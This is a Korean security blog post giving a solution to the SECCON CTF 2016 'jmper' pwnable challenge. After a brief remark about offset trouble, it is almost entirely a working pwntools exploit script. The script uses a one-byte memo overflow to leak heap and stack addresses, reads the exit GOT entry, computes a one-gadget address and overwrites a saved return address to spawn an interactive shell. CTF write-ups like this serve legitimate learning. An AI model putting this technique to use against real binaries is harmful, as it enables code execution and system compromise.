Notice
Recent Posts
Recent Comments
Link
«   2025/04   »
1 2 3 4 5
6 7 8 9 10 11 12
13 14 15 16 17 18 19
20 21 22 23 24 25 26
27 28 29 30
Tags
more
Archives
Today
Total
관리 메뉴

cdor1's lab

SECCON CTF 2016 jmper 본문

Security/Pwnable

SECCON CTF 2016 jmper

Cdor1 2016. 12. 28. 03:25

후기 : 오프셋때문에 진짜 더럽게고생했다... 문제는 참신하고 좋았지만 멍청한 컴돌이의 멘탈이 깨졌다

from pwn import *
s = remote('localhost', 4000)
elf = ELF('/home/parallels/pwnable/jmper')
libc = ELF('/home/parallels/pwnable/cdor1_libc')

exit_got = elf.got['exit']

def add():
	s.recvuntil(':)')
	s.sendline('1')

def name(id, name):
	s.recvuntil(':)')
	s.sendline('2')
	s.recvuntil('ID:')
	s.sendline(str(id))
	s.recvuntil('Input name:')
	s.sendline(name)

def memo(id, memo):
        s.recvuntil(':)')
        s.sendline('3')
        s.recvuntil('ID:')
        s.sendline(str(id))
        s.recvuntil('Input memo:')
        s.sendline(memo)

def show_name(id):
        s.recvuntil(':)')
        s.sendline('4')
        s.recvuntil('ID:')
        s.sendline(str(id))
        
def show_memo(id):
        s.recvuntil(':)')
        s.sendline('5')
        s.recvuntil('ID:')
        s.sendline(str(id))

print '[*] start exploit!'

add()
memo(0, 'a'*32)
show_memo(0)
s.recvuntil('a'*32)
leak = u32(s.recv(4))
print '[*] leaked : ' + hex(leak)

add()
memo(1, 'a'*32 + '\x78')
name(1, p32(leak - 0xF8))
show_name(1)
esp = u64(s.recv(12).ljust(8,'\x00'))
print '[*] esp : ' + hex(esp)

add()
memo(2, 'a'*32 + '\x58')
add()
name(2, p32(exit_got))
show_name(3)
exit_leak =  u64(s.recv(12).ljust(8,"\x00"))
oneshot = exit_leak + 0xA248
print '[*] exit : ' + hex(exit_leak)
print '[*] oneshot : ' + hex(oneshot)

add()
memo(4, 'd'*32 + '\xc8')
name(4, p64(esp - 0xd8))
add()
name(4, p64(oneshot))

for i in range(0,25):
	add()

s.interactive()

'Security > Pwnable' 카테고리의 다른 글

BoBCTF - megabox  (0) 2017.01.05
Christmasctf2016 - House of Daehee  (0) 2017.01.04
SECCON CTF 2016 chat  (0) 2016.12.18
BCTF memo  (0) 2016.12.11
fastbin consolidate  (0) 2016.12.08
공유하기 링크
'Security/Pwnable' Related Articles more
Comments